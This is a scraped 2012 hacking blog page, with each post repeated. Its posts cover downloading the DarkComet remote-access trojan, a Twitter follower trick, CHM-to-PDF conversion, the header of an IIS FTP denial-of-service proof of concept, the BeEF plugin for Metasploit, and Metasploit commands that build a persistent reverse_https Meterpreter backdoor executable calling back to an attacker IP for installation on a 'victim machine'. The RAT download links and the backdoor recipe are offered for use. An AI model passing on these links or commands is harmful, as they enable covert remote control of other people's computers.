Saturday, 7 July 2012
Lahore University Website Hacked By INDI-HEX
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Labels:
backdoor,
bot,
dos,
exploitation,
Hacking,
hacking tool,
Information Security,
Microsoft,
pentest,
security,
Source,
tool,
trick,
trojan
Friday, 6 July 2012
How To Get Thousands Of Twitter Followers Per Day
Twitter, One of the most popular Micro Blogging Website today. Having hundreds and thousands of followers can be very beneficial fro you if you are a Blogger who is in a need for more traffic, By sharing your post links on Twitter. If you are not having Followers then sharing your post links won't help you to generate traffic for your blog/website, To get the appropriate traffic you should have Followers. There are many online websites and services which provides Twitter Followers for free, They help you to increase your followers but they don't help you to Generate traffic by sharing your post, Because those websites are automates and ultimately you won't get any traffic. Don't worry in this post I will be telling you all how to get thousands of twitter followers by just tweeting.
#teamfollowback is A Group of twitter members on twitter, who want a lot of followers. You need to join their Group by adding #teamfollowback suffix or Prefix on while tweeting.
Login to your Twitter Account.
Search For #teamfollowback
Follow the people who have added #teamfollowback #ifollowback #ifollowall in there tweets.
Follow morre and more people who have added those tags in there tweets, You will get the same i.e more followers.
Some more hash tags to get Followers on Twitter.
#teamfollowback
#ifollowall
#ifollowback
#1000_aday
#TFB
#followandgain
#TeamAutoFollow
#AutoFollowBack
#InstantFollow
#teamfollowback is A Group of twitter members on twitter, who want a lot of followers. You need to join their Group by adding #teamfollowback suffix or Prefix on while tweeting.
Login to your Twitter Account.
Search For #teamfollowback
Follow the people who have added #teamfollowback #ifollowback #ifollowall in there tweets.
Follow morre and more people who have added those tags in there tweets, You will get the same i.e more followers.
Some more hash tags to get Followers on Twitter.
#teamfollowback
#ifollowall
#ifollowback
#1000_aday
#TFB
#followandgain
#TeamAutoFollow
#AutoFollowBack
#InstantFollow
Tuesday, 3 July 2012
How to convert CHM files into PDF files in Ubuntu
In the Ubuntu, chm2pdf is a Python script that converts CHM files into PDF files.
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
1. Install chm2pdf in ubuntu and another required application$sudo aptitude install chm2pdf python-chm pdftk htmldoc
2. Use the command chm2pdf
$ chm2pdf --book file.chm
3. you will receive file.pdf.
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Labels:
article,
howto,
Information Security,
packet analysis,
Source,
tool,
trick
Monday, 2 July 2012
Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
If you want to see the exploit code, please go to the Source.
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
Labels:
article,
dos,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
pentest,
security,
tool,
trick,
Vulnerability
Using beef plugin with Metasploit
1. Run the beef service
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
Labels:
article,
backtrack,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
pentest,
security,
tool,
trick,
Vulnerability,
Web,
Web Application,
Web Application Attack,
xss
Create Auto reconnect Backdoor With Metasploit
This post will show how to install the autoconnect backdoor in victim machine.
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
Labels:
APT,
exploitation,
Hacking,
howto,
Information Security,
metasploit,
Network Security,
pentest,
security,
trick,
Vulnerability
Subscribe to:
Posts (Atom)
